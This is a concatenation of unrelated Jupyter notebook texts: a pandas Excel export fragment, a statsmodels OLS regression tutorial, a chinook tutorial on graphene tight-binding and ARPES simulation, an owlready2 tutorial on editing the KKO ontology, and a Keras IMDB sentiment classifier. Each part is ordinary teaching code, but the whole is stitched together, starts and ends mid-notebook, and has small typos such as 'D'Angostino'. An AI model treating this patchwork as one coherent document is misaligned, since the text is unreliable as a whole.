with pd.ExcelWriter("High Level Table First 2 weeks of August PRMT-2324.xlsx") as writer:
generate_high_level_table(transfers.copy()).to_excel(writer, sheet_name="All",index=False)
[generate_high_level_table(transfers[transfers['month']==month].copy()).to_excel(writer, sheet_name=str(month),index=False) for month in transfers['month'].unique()]
###Output
_____no_output_____ |
Linear_Regression/OLS_Statsmodels.ipynb | ###Markdown
Regression formulaLooks like you're good for the linearity assumption, and additionally, the distributions for height and weight look reasonable (and even pretty normal!). Now, let's run the regression. Statsmodels allows users to fit statistical models using R-style formulas. The formula framework is quite powerful and for simple regression it is written using a ~ as Y ~ X.The formula gives instruction for a general structure for a regression call. For a statsmodels ols calls, you'll need a Pandas dataframe with column names that you will add to your formula.
###Code
f = 'weight~height'
###Output
_____no_output_____
###Markdown
You can we pass the formula with variable names to ols along with fit() to fit a linear model to given variables.
###Code
model = ols(formula=f, data=df).fit()
###Output
_____no_output_____
###Markdown
Now, you can go ahead and inspect your fitted model in many ways. First, let's get a summary of what the model contains using model.summary()
###Code
model.summary()
###Output
_____no_output_____
###Markdown
Warnings:[1] Standard Errors assume that the covariance matrix of the errors is correctly specified.Wow, that's a lot of information. Statsmodels performs a ton of tests and calculates measures to identify goodness of fit.You can find the R-Squared, which is 0.95 i.e. the data are very linearly relatedYou can also look at the coefficients of the model for intercept and slope (next to "height")Kurtosis and Skew values are shown hereA lot of significance testing is being done hereHere is a brief description of these measures:The left part of the first table gives some specifics on the data and the model:Dep. Variable: Singular. Which variable is the point of interest of the modelModel: Technique used, an abbreviated version of Method (see methods for more).Method: The loss function optimized in the parameter selection process. Least Squares since it picks the parameters that reduce the training error. This is also known as Mean Square Error [MSE].No. Observations: The number of observations used by the model, or size of the training data.Degrees of Freedom Residuals: Degrees of freedom of the residuals, which is the number of observations – number of parameters. Intercept is a parameter. The purpose of Degrees of Freedom is to reflect the impact of descriptive/summarizing statistics in the model, which in regression is the coefficient. Since the observations must "live up" to these parameters, they only have so many free observations, and the rest must be reserved to "live up" to the parameters' prophecy. This internal mechanism ensures that there are enough observations to match the parameters.Degrees of Freedom Model: The number of parameters in the model (not including the constant/intercept term if present)Covariance Type: Robust regression methods are designed to be not overly affected by violations of assumptions by the underlying data-generating process. Since this model is Ordinary Least Squares, it is non-robust and therefore highly sensitive to outliers.The right part of the first table shows the goodness of fit:R-squared: The coefficient of determination, the Sum Squares of Regression divided by Total Sum Squares. This translates to the percent of variance explained by the model. The remaining percentage represents the variance explained by error, the E term, the part that model and predictors fail to grasp.Adj. R-squared: Version of the R-Squared that penalizes additional independent variables.F-statistic: A measure of how significant the fit is. The mean squared error of the model divided by the mean squared error of the residuals. Feeds into the calculation of the P-Value.Prob (F-statistic) or P-Value: The probability that a sample like this would yield the above statistic, and whether the model's verdict on the null hypothesis will consistently represent the population. Does not measure effect magnitude, instead measures the integrity and consistency of this test on this group of data.Log-likelihood: The log of the likelihood function.AIC: The Akaike Information Criterion. Adjusts the log-likelihood based on the number of observations and the complexity of the model. Penalizes the model selection metrics when more independent variables are added.BIC: The Bayesian Information Criterion. Similar to the AIC, but has a higher penalty for models with more parameters. Penalizes the model selection metrics when more independent variables are added.The second table shows the coefficient report:coef: The estimated value of the coefficient. By how much the model multiplies the independent value by.std err: The basic standard error of the estimate of the coefficient. Average distance deviation of the points from the model, which offers a unit relevant way to gauge model accuracy.t: The t-statistic value. This is a measure of how statistically significant the coefficient is.P > |t|: P-value that the null-hypothesis that the coefficient = 0 is true. If it is less than the confidence level, often 0.05, it indicates that there is a statistically significant relationship between the term and the response.[95.0% Conf. Interval]: The lower and upper values of the 95% confidence interval. Specific range of the possible coefficient values.The third table shows information about the residuals, autocorrelation, and multicollinearity:Skewness: A measure of the symmetry of the data about the mean. Normally-distributed errors should be symmetrically distributed about the mean (equal amounts above and below the line). The normal distribution has 0 skew.Kurtosis: A measure of the shape of the distribution. Compares the amount of data close to the mean with those far away from the mean (in the tails), so model "peakiness". The normal distribution has a Kurtosis of 3, and the greater the number, the more the curve peaks.Omnibus D’Angostino’s test: Provides a combined statistical test for the presence of skewness and kurtosis.Prob(Omnibus): The above statistic turned into a probabilityJarque-Bera: A different test of the skewness and kurtosisProb (JB): The above statistic turned into a probabilityDurbin-Watson: A test for the presence of autocorrelation (that the errors are not independent), which is often important in time-series analysisCond. No: A test for multicollinearity (if in a fit with multiple parameters, the parameters are related to each other).The interpretation of some of these measures will be explained in the next lessons. For others, you'll get a better insight into them in the lessons on statistics. Visualize error terms>You can also plot some visualizations to check the regression assumptions with respect to the error terms. You'll use sm.graphics.plot_regress_exog() for some built-in visualization capabilities of statsmodels. Here is how to do it:
###Code
fig = plt.figure(figsize=(15,8))
fig = sm.graphics.plot_regress_exog(model, "height", fig=fig)
plt.show()
###Output
_____no_output_____
###Markdown
For the four graphs we see above:The Y and Fitted vs. X graph plots the dependent variable against our predicted values with a confidence interval. The positive relationship shows that height and weight are correlated, i.e., when one variable increases the other increases.The Residuals versus height graph shows our model's errors versus the specified predictor variable. Each dot is an observed value; the line represents the mean of those observed values. Since there's no pattern in the distance between the dots and the mean value, the OLS assumption of homoskedasticity holds.The Partial regression plot shows the relationship between height and weight, taking in to account the impact of adding other independent variables on our existing height coefficient. You'll later learn how this same graph changes when you add more variables.The Component and Component Plus Residual (CCPR) plot is an extension of the partial regression plot. It shows where the trend line would lie after adding the impact of adding our other independent variables on the weight. Q-Q PlotsTo check for the normality assumption, you can obtain error terms (residuals) from the model and draw Q-Q Plot against a standard normal distribution as shown below. While the residuals do not seem to match up perfectly with the red line, there seem to be no super clear deviations from the red line. So you can assume that you're OK for the normality assumption.
###Code
import scipy.stats as stats
residuals = model.resid
fig = sm.graphics.qqplot(residuals, dist=stats.norm, line='45', fit=True)
fig.show()
###Output
<ipython-input-15-8c4a1944e451>:4: UserWarning: Matplotlib is currently using module://ipykernel.pylab.backend_inline, which is a non-GUI backend, so cannot show the figure.
fig.show()
|
docs/build/html/_downloads/1abc96ce83e8f776d77fd3006a49c258/QMI Student Seminar-Graphene.ipynb | ###Markdown
Introduction to Chinook with Graphene In the following exercise, we'll get a feeling for building and characterizing tight-binding models in chinook, in addition to some calculation of the associated ARPES intensity. I'll use graphene for this exercise. I'll start by importing the requisite python libraries -- including the necessary chinook files. Numpy is the standard python numerics package.
###Code
import numpy as np
import chinook.build_lib as build_lib
import chinook.ARPES_lib as arpes_lib
import chinook.operator_library as op_lib
import chinook.orbital_plotting as oplot
###Output
_____no_output_____
###Markdown
Personally, I like to keep my model setup and my calculation execution in separate .py scripts. For the sake of code readability this helps a lot. For this Jupyter notebook though, I'm going to do things sort of linearly. It gets a bit cluttered, but will help with the flow. Have a look at the .py files saved on the same page as this notebook for the same exercises written in native python scripts. To define a tight-binding model, I'll need four things: a lattice, an orbital basis, a Hamiltonian, and a momentum path of interest. We start with the lattice.
###Code
alatt = 2.46
interlayer = 100.0
avec = np.array([[-alatt/2,alatt*np.sqrt(3/4.),0.0],
[alatt/2,alatt*np.sqrt(3/4.),0.0],
[0.0,0.0,interlayer]])
###Output
_____no_output_____
###Markdown
Even though we are doing a 2D lattice, it's embedded in 3D space we live in. I've then defined an 'interlayer' distance, but this is fictitiously large so there will not be any 'interlayer' coupling. Next, we define our orbital basis:
###Code
spin_args = {'bool':False}
basis_positions = np.array([[0.0,0.0,0.0],
[0.0,alatt/np.sqrt(3.0),0.0]])
basis_args = {'atoms':[0,0],
'Z':{0:6},
'orbs':[["20","21x","21y","21z"],["20","21x","21y","21z"]],
'pos':basis_positions,
'spin':spin_args}
###Output
_____no_output_____
###Markdown
I'm going to ignore the spin-degree of freedom so I'm turning off the spin-switch. In other systems, these 'spin_args' allow for incorporation of spin-orbit coupling and magnetic ordering. The graphene lattice has two basis atoms per unit cell, and for now I'll include the full Carbon 2sp orbital space. This is a good point to clarify that most objects we define in chinook are generated using the 'dictionary' structure I've used here, where we use key-value pairs to define attributes in a user-readable fashion. After the basis, I'll define my Hamiltonian. Following the introduction to Slater-Koster tight-binding, I define the relevant hoppings in the SK dictionary. The keys specify the atoms and orbitals associated with the hopping value. For example, '002211P' corresponds to the $V_{pp\pi}$ hopping between the 0$^{th}$ and 0$^{th}$ atom in our basis, coupling specifically the 2p (n=2, l=1) states.
###Code
SK = {"020":-8.81,"021":-0.44, #onsite energies
"002200S":-5.279, #nearest-neighbour Vssσ
"002201S":5.618, #nearest-neighbour Vspσ
"002211S":6.05,"002211P":-3.07} #nearest-neighbour Vppσ,Vppπ
hamiltonian_args = {'type':'SK',
'V':SK,
'avec':avec,
'cutoff':alatt*0.7,
'spin':spin_args}
###Output
_____no_output_____
###Markdown
Before building our model, the last thing I'll do is specify a k-path along which I want to find the band-structure.
###Code
G = np.array([0,0,0])
K = np.array([1./3,2./3,0])
M = np.array([0,0.5,0.0])
momentum_args= {'type':'F',
'avec':avec,
'grain':200,
'pts':[G,K,M,G],
'labels':['$\\Gamma$','K','M','$\\Gamma$']}
###Output
_____no_output_____
###Markdown
Finally then, I'll use the chinook.build_library to actually construct a tight-binding model for our use here
###Code
basis = build_lib.gen_basis(basis_args)
kpath = build_lib.gen_K(momentum_args)
TB = build_lib.gen_TB(basis,hamiltonian_args,kpath)
###Output
_____no_output_____
###Markdown
With this model so defined, I can now compute the eigenvalues along my k-path of interest:
###Code
TB.solve_H()
TB.plotting()
###Output
_____no_output_____
###Markdown
We see very nicely then the linear Dirac dispersion for which graphene is so famous, in addition the the sigma-bonding states at higher energies below $E_F$, composed of sp$_2$ hybrids, from which its mechanical strength is derived. Note also that I've chosen to n-dope my graphene, shifting the Dirac point below the chemical potential. Such a shift is routinely observed in graphene which is not free-standing, as typically used in ARPES experiments. To understand the orbital composition more explicitly, I can compute the projection of the tight-binding eigenvectors onto the orbitals of my basis using the chinook.operator_library. Before doing so, I'll use a built-in method for the TB model object we've created to determine clearly, my orbital basis:
###Code
TB.print_basis_summary()
###Output
Index | Atom | Label | Spin | Position
================================================
0 | 0 |20 | 0.5| 0.000,0.000,0.000
1 | 0 |21x | 0.5| 0.000,0.000,0.000
2 | 0 |21y | 0.5| 0.000,0.000,0.000
3 | 0 |21z | 0.5| 0.000,0.000,0.000
4 | 0 |20 | 0.5| 0.000,1.420,0.000
5 | 0 |21x | 0.5| 0.000,1.420,0.000
6 | 0 |21y | 0.5| 0.000,1.420,0.000
7 | 0 |21z | 0.5| 0.000,1.420,0.000
###Markdown
Clearly, orbitals [0,4] are 2s, [1,5] are 2p$_x$, [2,6] are 2p$_y$ and [3,7] are 2p$_z$. I'll use the op_lib.fatbs function to plot 'fat' bands for these basis combinations:
###Code
C2s = op_lib.fatbs([0,4],TB,Elims=(-30,15))
C2x = op_lib.fatbs([1,5],TB,Elims=(-30,15))
C2y = op_lib.fatbs([2,6],TB,Elims=(-30,15))
C2z = op_lib.fatbs([3,7],TB,Elims=(-30,15))
###Output
_____no_output_____
###Markdown
From these results, it's immediatedly obvious that if I am only concerned with the low-energy physics near the chemical potential (within $\pm$ 3 eV), then it is perfectly reasonable to adopt a model with only p$_z$ orbitals. I can actually redefine my model accordingly.
###Code
basis_args = {'atoms':[0,0],
'Z':{0:6},
'orbs':[["21z"],["21z"]],
'pos':basis_positions,
'spin':spin_args}
basis = build_lib.gen_basis(basis_args)
TB_pz = build_lib.gen_TB(basis,hamiltonian_args,kpath)
TB_pz.solve_H()
TB_pz.plotting()
###Output
_____no_output_____
###Markdown
The only difference in the above was that I redined the "orbs" argument for the basis definition, cutting out the "20", "21x", "21y" states. There is some redundancy left in this model, specifically I have defined additional hopping elements and onsite energies (for the 2s) which will not be used. Let's shift our attention to ARPES. In ARPES experiments, one usually only sees one side of the Dirac cone. This is due to interference between the the two sublattice sites. To understand this, we can plot directly the tight-binding eigenvectors near the K-point. Since we defined our k-path with 200 points between each high-symmetry point, I'll plot the eigenvectors at the 190$^{th}$ k-point.
###Code
eigenvector1 = TB_pz.Evec[190,:,0]
eigenvector2 = TB_pz.Evec[190,:,1]
wfunction1 = oplot.wavefunction(basis=TB_pz.basis,vector=eigenvector1)
wfunction2 = oplot.wavefunction(basis=TB_pz.basis,vector=eigenvector2)
wplot1 = wfunction1.triangulate_wavefunction(20)
wplot2 = wfunction2.triangulate_wavefunction(20)
###Output
/Users/ryanday/anaconda3/lib/python3.7/site-packages/matplotlib/figure.py:2299: UserWarning: This figure includes Axes that are not compatible with tight_layout, so results might be incorrect.
warnings.warn("This figure includes Axes that are not compatible "
###Markdown
We see that the lower-energy state is the symmetric combination of sites $A$ and $B$, whereas the higher energy state is the antisymmetric combination. So we can anticipate that the symmetric state will produce constructive interference, whereas the antisymmetric will destructively interfere. Ok, let's continue with this model to calculate the ARPES spectra.
###Code
Kpt = np.array([1.702,0.0,0.0])
klimits = 0.1
Elimits = [-1.25,0.25]
Npoints = 100
arpes_args={'cube':{'X':[Kpt[0]-klimits,Kpt[0]+klimits,Npoints],
'Y':[Kpt[1]-klimits,Kpt[1]+klimits,Npoints],
'kz':Kpt[2],
'E':[Elimits[0],Elimits[1],1000]},
'SE':['poly',0.01,0,0.1], #Self-energy arguments (lineshape)
'hv': 21.2, # Photon energy (eV)
'pol':np.array([-1,0,1]), #light-polarization
'resolution':{'E':0.02,'k':0.005}, #energy, momentum resolution
'T':4.2} #Temperature (for Fermi distribution)
experiment = arpes_lib.experiment(TB_pz,arpes_args)
experiment.datacube()
Imap,Imap_resolution,axes = experiment.spectral(slice_select=('y',0))
Imap,Imap_resolution,axes = experiment.spectral(slice_select=('E',0))
Imap,Imap_resolution,axes = experiment.spectral(slice_select=('x',Kpt[0]))
###Output
_____no_output_____
###Markdown
I can also compare the result against what I would have with my larger basis size.
###Code
experiment_fullbasis = arpes_lib.experiment(TB,arpes_args)
experiment_fullbasis.datacube()
Imap,Imap_resolution,axes = experiment_fullbasis.spectral(slice_select=('x',Kpt[0]))
###Output
Initiate diagonalization:
Large memory load: splitting diagonalization into 2 segments
Diagonalization Complete.
Begin computing matrix elements:
||||||||||||||||||||||||||||||100%
Done matrix elements
###Markdown
Perhaps unsurprisingly, the result is the same, as symmetries of the 2D lattice preclude hybridization of the Carbon 2p$_z$ orbitals with any of the other 2sp states. Manipulating the Hamiltonian We can go beyond here and now start playing with our Hamiltonian. One possibility is to consider the effect of breaking inversion symmetry by imposing an onsite energy difference between the two Carbon sites. This is the familiar Semenoff mass proposed by UBC's Gordon Semenoff, as it modifies the massless Dirac dispersion near the K-point to become massive. I will define a simple helper function for this task:
###Code
def semenoff_mass(TB,mass):
Hnew = [[0,0,0,0,0,mass/2],
[1,1,0,0,0,-mass/2]]
TB.append_H(Hnew)
###Output
_____no_output_____
###Markdown
I can then call this function, acting on the pz-only model:
###Code
TB_semenoff = build_lib.gen_TB(basis,hamiltonian_args,kpath)
semenoff_mass(TB_semenoff,0.5)
TB_semenoff.Kobj = kpath
TB_semenoff.solve_H()
TB_semenoff.plotting()
###Output
_____no_output_____
###Markdown
By breaking inversion symmetry in the crystal, I have opened a gap at the K-point. The Dirac point need only be degenerate if both inversion and time reversal symmetries are preserved. Note that I have redefined my kpath to follow the same points as before, as the ARPES calculations impose the mesh of k-points used. Near the k-point, rather than have 'bonding' and 'anti-bonding' character, the Semenoff mass localizes the the wavefunction on one or the other sites. Printing the orbital wavefunction near K for the lower and upper states:
###Code
eigenvector1 = TB_semenoff.Evec[190,:,0]
eigenvector2 = TB_semenoff.Evec[190,:,1]
wfunction1 = oplot.wavefunction(basis=TB_semenoff.basis,vector=eigenvector1)
wfunction2 = oplot.wavefunction(basis=TB_semenoff.basis,vector=eigenvector2)
wplot1 = wfunction1.triangulate_wavefunction(20)
wplot2 = wfunction2.triangulate_wavefunction(20)
###Output
/Users/ryanday/anaconda3/lib/python3.7/site-packages/matplotlib/figure.py:2299: UserWarning: This figure includes Axes that are not compatible with tight_layout, so results might be incorrect.
warnings.warn("This figure includes Axes that are not compatible "
###Markdown
We see nicely that the eigenvector has been changed from before--while still resembling the symmetric and antisymmetric combinations we had above, now the charge distribution lies predominantly on one or the other site. Try changing the momentum point where you evaluate this, or increasing/decreasing the size of the mass term to observe its effect. I can compute the photoemission again, resulting in a gapped spectrum
###Code
experiment_semenoff = arpes_lib.experiment(TB_semenoff,arpes_args)
experiment_semenoff.datacube()
_ = experiment_semenoff.spectral(slice_select=('x',Kpt[0]))
_ = experiment_semenoff.spectral(slice_select=('w',-0.0))
###Output
_____no_output_____
###Markdown
In addition to the gap, we also see the modification of the eigenstate manifest in the redistribution of spectral weight on the Fermi surface, which no longer features the complete extinction of intensity on the inside the cone. While the Semenoff mass does not break time-reversal symmetry, Duncan Haldane proposed a different form of perturbation which would have this effect. The Haldane model introduces a complex second-nearest neighbour hopping which has opposite sign on the two sublattice sites. I'll define again a function to introduce this perturbation:
###Code
def haldane_mass(TB,mass):
Hnew = []
vectors = [TB.avec[0],TB.avec[1],TB.avec[1]-TB.avec[0]]
for ii in range(2):
for jj in range(3):
Hnew.append([ii,ii,*vectors[jj],-(2*ii-1)*0.5j*mass])
Hnew.append([ii,ii,*(-vectors[jj]),(2*ii-1)*0.5j*mass])
TB.append_H(Hnew)
###Output
_____no_output_____
###Markdown
This function generates the simplest form of Haldane mass, with fixed phase. You can try modifying the above function to allow for arbitrary phase. I'm going to define a separate tight-binding model for this perturbation, identical to the unperturbed p$_z$-only basis I used above. I'll then add a Haldane mass term which will result in roughly the same energy splitting as for the Semenoff mass.
###Code
TB_haldane = build_lib.gen_TB(basis,hamiltonian_args,kpath)
haldane_mass(TB_haldane,0.3)
TB_haldane.solve_H()
TB_haldane.plotting()
###Output
_____no_output_____
###Markdown
Evidently, we have effectively the same dispersion as before--breaking time-reversal symmetry now has the effect of gapping out the Dirac cone just as inversion symmetry breaking did. Finally, I can of course also choose to add both a Haldane and a Semenoff mass. For a critically large Haldane mass, I enter a topologically non-trivial phase. In this case, it is useful to consider both inequivalent Dirac points in the unit cell. So I use a modified k-path here:
###Code
momentum_args= {'type':'F',
'avec':avec,
'grain':500,
'pts':[-1.5*K,-K,G,K,1.5*K],
'labels':["1.5K'","K'",'$\\Gamma$','K','1.5K']}
kpath_halsem = build_lib.gen_K(momentum_args)
TB_halsem = build_lib.gen_TB(basis,hamiltonian_args,kpath_halsem)
haldane_mass(TB_halsem,0.25/np.sqrt(3))
semenoff_mass(TB_halsem,0.25)
TB_halsem.solve_H()
TB_halsem.plotting(-1,0.5)
###Output
_____no_output_____
###Markdown
There we go, I've now broken both time-reversal and inversion symmetry, modifying the dispersion in a non-trivial way. While the $K$ and $K'$ points will be energetically inequivalent for arbitrary choices of $m_S$ and $m_H$, at $m_H$=$m_S/\sqrt{3}$ (as written in our formalism), the gap at $K$ closes. This can be contrast with the choice of Semenoff, and Haldane only, along this same path through both inequivalent k-points of the Brillouin zone.
###Code
TB_semenoff.Kobj = kpath_halsem
TB_haldane.Kobj = kpath_halsem
TB_semenoff.solve_H()
TB_haldane.solve_H()
TB_semenoff.plotting(-1,0.5)
TB_haldane.plotting(-1,0.5)
###Output
_____no_output_____
###Markdown
It is clear from this that the presence of either time-reversal or inversion symmetry preserve the energy-equivalence of the dispersion at $K$ and $K'$, and only by breaking both symmetries can we change this. Finally, we can compute the ARPES intensity for the system with critical Haldane and Semenoff masses at the $K$ and $K'$ points.
###Code
arpes_args['cube']['X'] =[-Kpt[0]-klimits,-Kpt[0]+klimits,500]
arpes_args['cube']['Y'] =[0,0,1]
arpes_args['cube']['E'] = [-1.5,0.25,1000]
experiment_halsem = arpes_lib.experiment(TB_halsem,arpes_args)
experiment_halsem.datacube()
_ = experiment_halsem.spectral(slice_select=('y',0),plot_bands=True)
arpes_args['cube']['X'] =[Kpt[0]-klimits,Kpt[0]+klimits,500]
experiment_halsem = arpes_lib.experiment(TB_halsem,arpes_args)
experiment_halsem.datacube()
_ = experiment_halsem.spectral(slice_select=('y',0),plot_bands=True)
###Output
Initiate diagonalization:
Diagonalization Complete.
Begin computing matrix elements:
||||||||||||||||||||||||||||||100%
Done matrix elements
|
cwpk-20-basic-management-1.ipynb | ###Markdown
CWPK 20: Basic Knowledge Graph Management - IIt's Time to Learn How to Do Some Productive WorkOur previous installments of the Cooking with Python and KBpedia series relied on the full knowledge graph, kbpedia_reference_concepts.owl. That approach was useful to test out whether our current Python and Jupyter Notebook configurations were adequate to handle the entire 58,000 reference concepts (RCs) in KBpedia. However, a file that large makes finding and navigating stuff a bit harder. For this installment, and a few that come thereafter, we will restrict our example to the much smaller upper ontology to KBpedia, KKO (Kbpedia Knowledge Ontology). This ontology only has hundreds of concepts, but has the full suite of functionality and component types found in the full system.In today's installment we will apply some of the basic commands in owlready2 we learned in the last installment. Owlready2 is the API to our OWL2 knowledge graphs. In today's installment we will explore the standard CRUD (create-read-update-delete) actions against the classes (reference concepts) in our graph. Since our efforts to date have focused on the R in CRUD (for reading), our emphasis today will be on class creation, updates and deletions.Remember, you may find the KKO reference file that we use for this installment, kko.owl where you first stored your KBpedia reference files. (What I call main in the code snippet below.) Load KKOWhich environment? The specific load routine you should choose below depends on whether you are using the online MyBinder service (the 'raw' version) or local files. See CWPK 17 for further details. Local File OptionLike in the last installment, we will follow good practice and use an absolute file or Web address to identify our existing ontology, KKO in this case. Unlike the last installment, we will comment out the little snippet of code we added to provide screen feedback that the file is properly referenced. (If you have any doubts, remove the comment character () to restore the feedback):
###Code
main = 'C:/1-PythonProjects/kbpedia/sandbox/kko.owl'
# with open(main) as fobj: # we are not commenting out the code to scroll through the file
# for line in fobj:
# print (line)
###Output
_____no_output_____
###Markdown
Again, you shift+enter or pick Run from the main menu to execute the cell contents. (If you chose to post the code lines to screen, you may clear the file listing from the screen by choosing Cell → All Output → Clear.)We will next consolidate multiple steps from the prior installment to make absolute file references for the imported SKOS ontology and then to actually load the files:
###Code
skos_file = 'http://www.w3.org/2004/02/skos/core'
from owlready2 import *
kko = get_ontology(main).load()
skos = get_ontology(skos_file).load()
kko.imported_ontologies.append(skos)
###Output
_____no_output_____
###Markdown
MyBinder OptionIf you are running this notebook online, do **NOT** run the above routines, since we will use the GitHub files, but now consolidate all steps into a single cell:
###Code
kko_file = 'https://raw.githubusercontent.com/Cognonto/CWPK/master/sandbox/builds/ontologies/kko.owl'
skos_file = 'http://www.w3.org/2004/02/skos/core'
from owlready2 import *
kko = get_ontology(kko_file).load()
skos = get_ontology(skos_file).load()
kko.imported_ontologies.append(skos)
###Output
_____no_output_____
###Markdown
Check Load ResultsOK, no matter which load option you used, we can again test to see if the ontologies registered in the system, only now specifying two base IRIs in a single command:
###Code
print(kko.base_iri,skos.base_iri)
###Output
http://kbpedia.org/ontologies/kko# http://www.w3.org/2004/02/skos/core#
###Markdown
We can also confirm that the two additional ontologies have been properly imported:
###Code
print(kko.imported_ontologies)
###Output
[get_ontology("http://www.w3.org/2004/02/skos/core#")]
###Markdown
Re-starting the NotebookI have alluded to it before, but let's now be explicit about how to stop-and-start a notebook, perhaps just to see whether we can clear memory and test whether all steps up to this point are working properly. To do so, go to File → Save and Checkpoint, and then File → Close and Halt. (You can insert a Rename step in there should you wish to look at multiple versions of what you are working on.)Upon closing, you will be returned to the main Jupyter Notebook directory screen, where you can navigate to the active file, click on it, and then after it loads, Run the cells up to this point to reclaim your prior working state. Inspecting KKO ContentsSo, we threw some steps in the process above to confirm that we were finding our files and loading them. We can now check to see if the classes have loaded properly since remaining steps focus on managing them:
###Code
list(kko.classes())
###Output
_____no_output_____
###Markdown
Further, we know that KKO has a class called Products. We also want to see if our file load has properly captured its subClassOf relationships. (In its baseline configuration KKO Products has three sub-classes: Primary ..., Secondary ..., and Tertiary ....) We will return to this cell below multiple times to confirm some of the later steps:
###Code
list(kko.Products.subclasses())
###Output
_____no_output_____
###Markdown
Create a New Class'Create' is the first part of the CRUD acronym. There are many ways to create new objects in Python and Owlready2. This section details three different examples. As you interact with these three examples, you may want to go back up to the cell above and test the list(kko.Products.subclasses()) code against the method.The first example defines a class WooProduct that it assigns as a subclass of Thing (the root of OWL), and then we assign the class to the Products class. Note that in the second cell of this method we assign a value of 'pass' to it, which is a Python convention for enabling an assignment without actual values as a placeholder for later use. You may see the 'pass' term frequently used as scripts set up their objects in the beginning of programs.
###Code
class WooProducts(Thing):
namespace = kko
class WooProducts(kko.Products):
pass
###Output
_____no_output_____
###Markdown
In the second method, we bypass the initial Thing assignment and directly assign the new class WooFoo:
###Code
class WooFoo(kko.Products):
namespace = kko
###Output
_____no_output_____
###Markdown
In the third of our examples, we instead use the native Python method of 'types' to do the assignment directly. This can be a useful approach when we are wanting to process longer lists of assignments directly:
###Code
import types
with kko:
ProductsFoo = types.new_class("ProductsFoo", (kko.Products,))
###Output
_____no_output_____
###Markdown
Update a ClassUnfortunately, there is no direct 'edit' or 'update' function in Owlready2. At the class level one can 'delete' (or 'destroy') a class (see below) and then create a new one, granted a two-step process. For properties, including class relationships such as subClassOf, there are built-in methods to '.append' or '.remove' the assignment without fully deleting the class or individual object. In this case, we remove WooProducts as a subClassOf Products:
###Code
WooProducts.is_a.remove(kko.Products)
###Output
_____no_output_____
###Markdown
Since updates tend to occur more for object properties and values, we discuss these options further two installments from now. Delete a ClassDeletion occurs through a 'destroy' function that completely removes the object and all of its references from the ontology.
###Code
destroy_entity(WooProducts)
###Output
_____no_output_____
###Markdown
Of course, other functions are available for the use of classes and individuals. See the **Additional Documentation** below for links explaining these options. Save the ChangesWhen all of your desired changes are made programmatically or via an interactive session such as this one, you are then ready to save the knowledge graph out for re-use. It is generally best to write out the modified ontology under a new file name to prevent overwriting your prior version. If, after inspection, you like your changes and see no problems, you can then re-name this file back to the original name and now make it your working version going forward (of course, use the file location of your own choice).
###Code
kko.save(file = "C:/1-PythonProjects/kbpedia/sandbox/kko-test.owl", format = "rdfxml")
###Output
_____no_output_____ |
dense_sentiment_classifier.ipynb | ###Markdown
Dense Sentiment Classifier classifying IMDB reviews by sentiment. Load dependencies
###Code
import keras
from keras.datasets import imdb
from keras.preprocessing.sequence import pad_sequences
from keras.models import Sequential
from keras.layers import Dense, Flatten, Dropout
from keras.layers import Embedding
from keras.callbacks import ModelCheckpoint
import os
from sklearn.metrics import roc_auc_score
import pandas as pd
import matplotlib.pyplot as plt
%matplotlib inline
###Output
_____no_output_____
###Markdown
Set Hyperparameter
###Code
output_dir = './model_output/dense'
epochs = 4
batch_size = 128
n_dim = 64
n_unique_words = 5000
n_words_to_skip = 50
max_review_length = 100
pad_type = trunc_type = 'pre'
n_dense = 64
dropout = 0.5
###Output
_____no_output_____
###Markdown
Load data
###Code
(x_train, y_train), (x_valid, y_valid) = imdb.load_data(num_words=n_unique_words, skip_top=n_words_to_skip)
x_train[0]
x_train[0:6]
for x in x_train[0:6]:
print(len(x))
y_train[0:6]
len(x_train), len(x_valid)
###Output
_____no_output_____
###Markdown
Restore words from index
###Code
word_index = keras.datasets.imdb.get_word_index()
word_index = {k:(v+3) for k,v in word_index.items()}
word_index["PAD"] = 0
word_index["START"] = 1
word_index["UNK"] = 2
word_index
index_word = {v:k for k,v in word_index.items()}
x_train[0]
' '.join(index_word[id] for id in x_train[0])
###Output
_____no_output_____
###Markdown
if we want to see all words
###Code
(all_x_train, _), (all_x_valid, _) = imdb.load_data()
' '.join(index_word[id] for id in all_x_train[0])
###Output
_____no_output_____
###Markdown
Preprocess data
###Code
x_train = pad_sequences(x_train, maxlen=max_review_length, padding=pad_type, truncating=trunc_type, value=0)
x_valid = pad_sequences(x_valid, maxlen=max_review_length, padding=pad_type, truncating=trunc_type, value=0)
x_train[0:6]
for x in x_train[0:6]:
print(len(x))
' '.join(index_word[id] for id in x_train[5])
###Output
_____no_output_____
###Markdown
Design NN Architecture
###Code
model = Sequential()
model.add(Embedding(n_unique_words, n_dim, input_length=max_review_length))
model.add(Flatten())
model.add(Dense(n_dense, activation='relu'))
model.add(Dropout(dropout))
model.add(Dense(1, activation='sigmoid'))
model.summary()
n_dim, n_unique_words, n_dim*n_unique_words
max_review_length, n_dim, n_dim*max_review_length
n_dense, n_dim*max_review_length*n_dense + n_dense
###Output
_____no_output_____
###Markdown
configure model
###Code
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
modelcheckpoint = ModelCheckpoint(filepath=output_dir+"/weights.{epoch:02d}.hdf5")
if not os.path.exists(output_dir):
os.makedirs(output_dir)
###Output
_____no_output_____
###Markdown
Train!
###Code
model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, verbose=1, validation_data=(x_valid, y_valid), callbacks=[modelcheckpoint])
###Output
Train on 25000 samples, validate on 25000 samples
Epoch 1/4
25000/25000 [==============================] - 9s 363us/step - loss: 0.5504 - acc: 0.6973 - val_loss: 0.3598 - val_acc: 0.8414
Epoch 2/4
25000/25000 [==============================] - 2s 97us/step - loss: 0.2790 - acc: 0.8877 - val_loss: 0.3489 - val_acc: 0.8445
Epoch 3/4
25000/25000 [==============================] - 2s 95us/step - loss: 0.1151 - acc: 0.9649 - val_loss: 0.4240 - val_acc: 0.8327
Epoch 4/4
25000/25000 [==============================] - 2s 97us/step - loss: 0.0239 - acc: 0.9964 - val_loss: 0.5248 - val_acc: 0.8334
###Markdown
Evaluate
###Code
model.load_weights(output_dir+'/weights.01.hdf5')
y_hat = model.predict_proba(x_valid)
y_hat[0]
plt.hist(y_hat)
_ = plt.axvline(x=0.5, color='orange')
pct_auc = roc_auc_score(y_valid, y_hat)*100.0
"{:0.2f}".format(pct_auc)
float_y_hat = []
for y in y_hat:
float_y_hat.append(y[0])
ydf = pd.DataFrame(list(zip(float_y_hat,y_valid)), columns=['y_hat', 'y'])
ydf.head(10)
' '.join(index_word[id] for id in all_x_valid[0])
' '.join(index_word[id] for id in all_x_valid[7])
###Output
_____no_output_____
###Markdown
Instances where neural net was wrong (review was negative but prediction was positive)
###Code
